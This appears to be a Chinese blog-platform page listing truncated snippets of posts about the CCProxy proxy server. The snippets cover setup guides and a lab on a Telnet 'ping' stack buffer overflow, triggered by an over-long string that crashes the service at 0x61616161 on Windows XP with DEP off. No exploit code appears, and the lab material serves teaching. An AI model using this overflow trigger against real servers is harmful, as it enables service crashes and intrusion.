**CCproxy缓冲区溢出** CCproxy是一款常用的代理服务器软件,用于共享网络连接。在Windows XP系统中,如果CCproxy存在缓冲区溢出漏洞攻击者可以发送特定的ping命令,这可能导致CCproxy服务响应异常,溢出其内部...
利用缓冲区溢出攻击:探测CCProxy与渗透入侵
缓冲区溢出是计算机安全领域的一个重要话题,由于其普遍性危害性,攻击者经常利用这种漏洞来实现渗透入侵提升权限。 首先,探测CCProxy代理服务器的步骤包括通过命令行工具telnet尝试连接到目标服务器。如果...
ccproxy使用指南
12-16 1万+
目的:虚拟机中需要访问外网,下载东西 开始做一个好运维 2021-12-16 1.ccproxy是什么? CCProxy是一个国产的支持HTTP、FTP、Gopher、SOCKS4/5、 Telnet、Secure(HTTPS)、News(NNTP)、 RTSP、MMS等代理协议的代理服务器软件 2.原理是什么? 对Web客户端来说,代理就是扮演服务器的角色,接受请求报文,返回响应报文。 对Web服务端来说,代理扮演的是客户端角色,发送Web请求报文,接受Web响应报文。 3.window..
CCProxy使用 记录
SigMap
05-11 327
下载安装CCProxy CCProxy设置 内网服务器设置 上图ip是可以连接外网的IP地址 如果想要永久代理, sudo vi /etc/profile添加一段 export http_proxy="http://ip:808/" export https_proxy="https://ip:808/" 上面的ip是可以连接外网的IP地址 ...
CCProxyProxifier使用教程
热门推荐
qq_44839815的博客
05-19 1万+
CCProxy使用(服务端): CCProxy运行在需要配置为代理服务器的电脑上 1. 点击设置,按自己需要选择要开的服务: 2. 点击高级,取消勾选"禁止局域网外部用户" 3. 点击账号,进入账号管理,选择允许部分,点击新建新增用户,可以对用户进行自定义配置 4. 服务端配置完成 Proxifier的使用(客户端): Proxifier运行在需要连接代理服务器的电脑上 1. 点击左上角配置文件,点击代理服务器 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gi
CCProxy漏洞利用
qq_67181251的博客
07-03 1308
CCProxy是一款代理服务器软件,不仅支持常见的HTTPSOCKETS代理,而且支持FTPTelnet协议。我们这次的漏洞就是在Telnet服务当中的。首先,使用ping指令进行大量输入,判断是否会出现栈溢出的情况,如果出现说明存在栈溢出漏洞,并且可以进行利用。使用kali通过telnet服务进行访问,ping指令后跟大量的重复字符。​​​​报错并且显示地址为0x61616161,说明确实存在缓冲区溢出漏洞,并且可以进行利用
使用CCProxy搭建部署linux centos7内网代理上网
weixin_53969394的博客
03-13 8874
使用CCProxy详细搭建部署centos代理上网
CCProxy Telnet Proxy Ping远程栈溢出分析
12-14 865
导读:   By:疯狗(B.C.T)   简单的了解了一下漏洞原因,问题出在ping上,首先先触发这个漏洞看看效果。   开启CC,然后telnet 127.0.0.1 23,出现如下提示   CCProxy Telnet>CCProxy Telnet Service Ready.   CCProxy Telnet>   直接输入ping AAAAAAAAAA...(超长的A),程序崩溃了
栈溢出
qq_41727218的博客
03-13 248
在想搞明白栈溢出之前,我们先弄清楚另外一件事:函数调用栈的过程 函数调用栈过程 用ebx寄存器esx寄存器来表示一个函数栈帧,ebx表示栈底指针、esx表示栈顶指针。函数调用栈的过程如下: 开辟栈帧 函数参数入栈:参数入栈的顺序是从右向左,当参数小于8个字节的时候用寄存器记录参数值,并将寄存器中的值入栈;当参数大于8个字节的时候,首先将主调函数的栈顶指针向上移动参数大小的位置,然后将参数...
网络安全实验:CCProxy缓冲区溢出攻击
程哥哥的一亩三分地
04-17 7147
CCProxy缓冲区溢出实验 一.实验环境说明 溢出对象:CCProxy(一款代理服务器软件,支持FTPTelnet) 调试工具:CDB、WinDbg、OllyDBG、IDA Pro etc 实验环境:VMware Workstation Pro、windows xp sp3(关闭dep)、python3、ActivePerl Windows XP SP3关闭DEP的方法:编辑C:\boot.ini文件,将/noexecute=optin 改为 /execute,重启系统 二.测试CCProxy是否存在漏
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值